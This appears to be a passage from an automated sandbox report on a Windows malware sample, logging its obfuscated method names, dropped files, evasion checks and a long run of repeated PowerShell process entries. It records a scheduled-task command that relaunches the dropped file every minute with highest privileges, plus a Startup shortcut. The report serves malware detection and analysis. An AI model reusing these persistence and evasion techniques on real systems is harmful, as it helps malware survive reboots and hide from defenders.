'mOj2Zkx9VgoYHyrWS33F5wHBnT9bIpw4JayNBXyZTmVbkYAdTWDCqRdd5Y1rtFtNFPpd4kQhNKdPLRR1ZC6nMNuJPO2qR', 'pepmqv2VWndNyFEEFAO5962QhQHCENPlsF6TigDpNvePmHwGSovdl2qctXjLWQKMgouEe5jekQx5wprJbWp7KtRP8X8wD', '_8NT7lINrwdwexoQOv1qi8CtgxaiIwRPAgZgQXzxRReFJ5yE7eBRd6hRnL0RHm4Uf6JJxTtSNsx0pIti9ItW5F5gHa4yMW', 'TF0RbxnECYnXqQnIZKsp0geYDV4tLJAdwwxmHNJEd4FZIufmwnDogmm7mqCkY2ROHxoveQ7zvtyrYAc50sA77uWoo56Ft'
            Source: SYSTEM.0.dr, 3GqSiOnMczjgnrSizD1bqVUyz5ANfue2d6tIc52d6Q6kfRkXS7pQiPq5sulpXTR3XkYNBnSXSDUCkM7An4EQJVED6GVGo.csHigh entropy of concatenated method names: 'bjtSMovcuXuwdSIC5roMyRk9ncsYgA1WxQ09cgnQgGOOI8EtoShTEwMRbRZasRvX8D8Ne40cpgIOmsx8g1VLmS4tzPa9u', 'HubpJOl2ESbadRN3k7skn', 'zf47TkcdgvU1IG5yRCu2X', 'TEHtli70EyH48XRIyLnUX', 'fZDnMqPdsJkpIjXB4PTbm'
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe File created: C:\Users\user\AppData\Roaming\SYSTEM (2 identical entries)

            Boot Survival

            Source: C:\Users\user\Desktop\72OWK7wBVH.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SYSTEM" /tr "C:\Users\user\AppData\Roaming\SYSTEM"
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SYSTEM.lnk (2 identical entries)

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (16 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (12 identical entries)
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe Process information set: NOOPENFILEERRORBOX (49 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (50 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\72OWK7wBVH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeMemory allocated: B50000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeMemory allocated: 1A860000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\SYSTEMMemory allocated: 1650000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\SYSTEMMemory allocated: 1B1F0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\SYSTEMMemory allocated: 1690000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\SYSTEMMemory allocated: 1B130000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\SYSTEMMemory allocated: B40000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\SYSTEMMemory allocated: 1AA10000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\SYSTEMThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeWindow / User API: threadDelayed 8911
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeWindow / User API: threadDelayed 937
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6279
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3490
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7170
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2584
